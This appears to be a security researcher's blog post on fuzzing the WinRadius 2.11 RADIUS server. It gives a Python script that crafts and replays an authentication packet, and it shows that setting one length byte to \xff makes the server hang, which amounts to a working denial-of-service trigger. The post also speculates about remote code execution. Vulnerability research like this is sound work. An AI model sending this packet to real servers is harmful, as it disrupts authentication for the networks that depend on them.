I set some time aside to test WinRadius yesterday. Fuzzing was done manually and using a Python script. I didn’t spend too much time on it, but I’m confident that there’s a remote code execution opportunity here. If no one else gets there first, I’ll revisit it in a few weeks.

Firstly, to ensure that our setup is good and to catch a packet, we can use ‘radclient’. I set up a user account adam/adam for testing purposes and then tried to authenticate:

Radius Client Test

Radius Client Test

radclient will form a RADIUS request from our STDIN data

Wireshark Capture

Wireshark Capture

We capture the packet we sent and the response

WinRadius 2.11

WinRadius 2.11

And we confirm that WinRadius received and accepted the request. Once this was done, we needed to create a template within Python, and did so as follows:

#!/usr/bin/python

from socket import *
import sys
import select

pwn =  "\x01" #Code 01
pwn += "\xff" #packet identifier
pwn += "\x00\x2c" #len 44
pwn += "\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23" #authenticator
pwn += "\x01" #t=User-Name(1)
pwn += "\x06" #avp: l=6
pwn += "\x61\x64\x61\x6d" #adam

pwn += "\x02" #avp t=User-Password(2)
pwn += "\x12" #avp: l=18
pwn += "\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21" #password (encrypted)

address = ('192.168.200.20', 1812)
server_socket = socket(AF_INET, SOCK_DGRAM)

server_socket.sendto(pwn, address)

We can now replay this packet as we wish, and confirm through Wireshark and WinRadius that all is good and we are being authenticated. The next challenge was to start manually mangling data. After about 15 minutes of trial and error, I found that changing line 16 from \x12 to \xff caused the application to consume all CPU available and hang indefinitely. I couldn’t cause a crash although with a bit more trial and error, as well as trying different Radius requests such as start/stop accounting, etc, I’d be surprised if there wasn’t a RCE somewhere here.

WinRadius DoS Code

WinRadius DoS Code


WinRadius Crash

WinRadius Crash

The application now hangs.